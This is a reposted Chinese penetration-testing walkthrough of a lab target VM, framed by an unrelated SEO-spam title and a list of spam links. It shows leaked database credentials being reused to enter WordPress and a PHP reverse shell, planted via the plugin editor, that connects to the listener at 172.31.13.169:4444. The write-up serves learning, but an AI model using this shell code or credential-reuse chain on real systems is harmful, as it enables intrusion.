当前位置: 首页 > news >正文

阿里巴巴公司网站建设众筹网站怎么做推广方案

阿里巴巴公司网站建设,众筹网站怎么做推广方案,咋建网站,网站 建设可行性报告准备工作 下载好靶机到本地后 VMware导入OVA 启动靶机 扫描信息 首先扫描整个C段发现主机 进一步扫描端口 从扫描结果可知#xff1a; Samba服务MySQLSSH端口网站端口 先对网站进行目录遍历 发现有wordpress网站和phpmyadmin管理系统 出现了非常多遍My name is togie.可能…准备工作 下载好靶机到本地后 VMware导入OVA 启动靶机 扫描信息 首先扫描整个C段发现主机 进一步扫描端口 从扫描结果可知 Samba服务MySQLSSH端口网站端口 先对网站进行目录遍历 发现有wordpress网站和phpmyadmin管理系统 出现了非常多遍My name is togie.可能是个重要信息 有phpmyadmin但不知道密码。 80端口没有更多收获转向Samba服务 列出分享目录的列表没有密码直接回车 访问 share$目录 首先去查看WP的配置文件一般里面会有连接数据库的密码 拿到数据库用户密码为Admin:TogieMYSQL12345^^ 再看看有没有别的信息 服务器密码为12345用户名未知 用刚刚拿到的密码去登phpmyadmin 成功但无法继续操作 去试试wordpress后台 地址/wordpress/wp-admin 复用之前的数据库账号密码试试 成功进入随后利用插件功能执行反弹shell 首先监听上线 编辑插件然后将我们的恶意shell粘贴进去 $sock fsockopen(172.31.13.169, 4444); //(监听端IP, 监听端口) $descriptorspec array( 0 $sock, 1 $sock, 2 $sock ); $process proc_open(/bin/sh, $descriptorspec, $pipes); proc_close($process); 提示更新成功接下来访问hello.php文件位置/wordpress/wp-content/plugins/hello.php kail这边也成功监听到上线 查看用户看到了togie账号结合到前面页面上重复多遍的My name is togie和 之前看到密码是12345的文件 猜测这是这位的账号密码刚好开着ssh账号试着登录。 成功上去查看sudo权限 已有sudo权限至此对靶机的渗透结束
http://www.dnsts.com.cn/news/130576.html

相关文章:

  • 免费建网站平台教做自己的网站难不难
  • 青岛做网站的信息技术公司wordpress创建登录页面模板
  • 网站设计的基本步骤推广文案范例
  • 网站的后台管理找施工员在哪个网站上找
  • 网站建设怎么找客户资源贵州贵州省住房和城乡建设厅网站
  • 大区直播间网站开发制作网络规划设计师视频网盘
  • 网站视觉优化怎么做天猫网站设计分析
  • 网站建设中最重要的wordpress 模拟数据
  • 专门做爬虫的网站龙口建设网站
  • 域名与网站海棠网站是什么意思
  • 天津的网站建设公司家教中介网站怎么做学员引流
  • 南宁网站建设公司怎么接单租房网58同城网租房
  • 电子政务网站系统域名申请后怎么建网站
  • 成都网站建设重庆最加科技wordpress 小说站主题
  • 自己做网站难吗平凉建设局官方网站
  • 做商城外贸网站wordpress页面立体效果
  • 国外建设网站首页vs网站开发源码
  • 广州市官网网站建设怎么样宁波网站推广服务
  • 旅游网网站的设计线上推广是什么意思
  • 漳州最便宜的网站建设价格网站被入侵别人是怎么做跳转的
  • 定制网站的价格低网站个人备案做论坛
  • 网站平台怎么建立网站免费网站免费麻豆
  • 在因特网上建设网站可选择的方案有wap企业网站模板
  • php做视频网站源码定制管理系统软件
  • 没事网站建设项目规划书黄冈建设局网站
  • 沈阳 教育 公司 网站建设万能搜索引擎入口
  • 网站怎么做免费seo搜索引擎Wordpress虚拟资源交易
  • 理财网站模板卓商网站建设公司
  • 推荐网站建设品牌静态网站开发篇
  • 网站试运营做网站如何宣传